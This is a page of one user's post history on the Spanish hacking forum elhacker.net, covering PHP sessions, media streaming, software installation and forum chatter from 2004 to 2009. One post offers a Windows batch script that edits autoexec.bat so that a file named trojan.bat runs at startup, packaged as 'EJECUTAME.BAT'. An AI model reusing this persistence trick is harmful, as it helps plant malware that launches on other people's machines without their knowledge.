elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13
101  Media / Diseño Gráfico / Re: elhacker.net te necesita ´´ICONOS!!´´ para la wiki/labs en: 31 Octubre 2009, 16:26 pm
Buenas,

si no recuerdo mal hace tiempo hacia falta gente para traducir textos... se que este no es aquel post, pero como veo que los tiros van más o menos por el mismo sitio, pues me ofrezco aquí.

Si necesitan a alguien para ir traduciendo, en ratos libres puedo ir haciendo, solo diganme el que y lo hago.  :)

En cuanto a lo de los iconos... ejem... "lo gráfico" no es lo mio...  :-\

Bye!
102  Seguridad Informática / Hacking / Re: [HOW TO] Ataque Modelo II, de excursión en la red en: 23 Octubre 2009, 04:46 am
Muy bueno tio, te explicas que da gusto leerte!! ;-)

Por lo que veo es el 2, no vi el uno, pero lo buscare aver que tal esta.

Saludos!

103  Programación / PHP / Re: Problema con sesiones en: 28 Mayo 2009, 19:43 pm
Buenas!

Puede que si... no te niego que suele funcionar igual, pero creia que era la manera "chapuzera" de hacerlo, por llamarlo de alguna manera. Yo esque aprendi directamente la teoria, y decia que era con el name y el id, pero bien.

Por otra parte, yo para cerrar session uso el session_unset(), supongo que la funcion sera similar.

C u!
104  Programación / PHP / Re: Problema con sesiones en: 28 Mayo 2009, 11:38 am
Entonces cuando ya tienes una session abierta, con sus variables y todo(de session), y pasas a otra pagina, para que las variables se mantengan no le tienes que poner aquello de:
Citar
loquesea.php?".session_name()."=".session_id();
despues del nombre del archivo??

Yo creia que si no lo ponias no reconocia las variables....

Ok, thks!

C u!
105  Programación / PHP / Re: Problema con sesiones en: 27 Mayo 2009, 01:10 am
Parto de la base que el segundo codigo que pones es el username.php.

He visto que en ese archivo, te pones a guardar variables de session, sin haber abierto ninguna session... alomejor es por eso.

Por otra parte, como le pasas las sessiones de una pagina a otra?
Al mismo tiempo que le indicas el archivo al que tiene que ir, le tienes que indicar el nombre de session y la id.

No lo acabo de ver claro... pero bueno, tampoco se mucho de php...  :-\

C u!
106  Foros Generales / Foro Libre / Re: El juego del numero con imagenes en: 5 Mayo 2009, 13:10 pm
107  Media / Multimedia / Re: problema con videos de internet.. en: 3 Julio 2004, 22:18 pm
bueno, a mi me ha sido más facil, he puesto en el navegador http://200.73.177.44/alta, y me ha dicho de descargar un archivo, a tardado un segundo, he puesto reproducir el archivo(con el xine, en el wmp no lo he probado) y a empezado a "recibir" la señal, como si estubiese en la televisión...

esto es de verdad un canal de televisión? no es un video grabado? eso funciona parecido a las playlists del winamp, no?

sal12

lord Alpha

pd= ahora estan haciendo un programa de cocina... xDD
108  Foros Generales / Dudas Generales / Re: Agregar lineas de texto a un archivo en: 23 Mayo 2004, 08:44 am
bueno, despues de un ratito he encontrado la "combinación" por decirlo así para poder hacer lo que tu quieres, aquí está:

Citar
@echo off

ren autoexec.bat *.txt
more autoexec.txt > temp.txt
echo c:\windows\escritorio\trojan.bat > autoexec.txt
more temp.txt >> autoexec.txt
ren autoexec.txt *.bat
del temp.txt

esto lo pones en un .txt y lo renombras a EJECUTAME.BAT, solo tiene un problemilla, que pone la cadena de ejecucion del trojan.bat ANTES del @echo off, aunque tampoco se si eso es un problema de verdad.

Bueno, espero averte ayudado.

sal12

lord Alpha
109  Informática / Software / Re:error con el alcohol 120%... en: 18 Marzo 2004, 10:11 am
si, de un 98SE a un XP... :o... xDD

bueno, voi a probar aver que tal... graziax

sal12

lord Alpha
110  Informática / Software / Re:error con el alcohol 120%... en: 17 Marzo 2004, 21:53 pm
weno, ya esta, al final no e conseguido instalar el alcohol, e pasado la imagen .cue a .iso, y la e quemado con el nero... aunque aun asi, si alguien sabe que le pasa al alcohol, que lo diga plis...
ah! tambien e probado a limpiar todo el registro de win pa ver si era eso, pero na! tampoco puedo...

sal12

lord Alpha
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines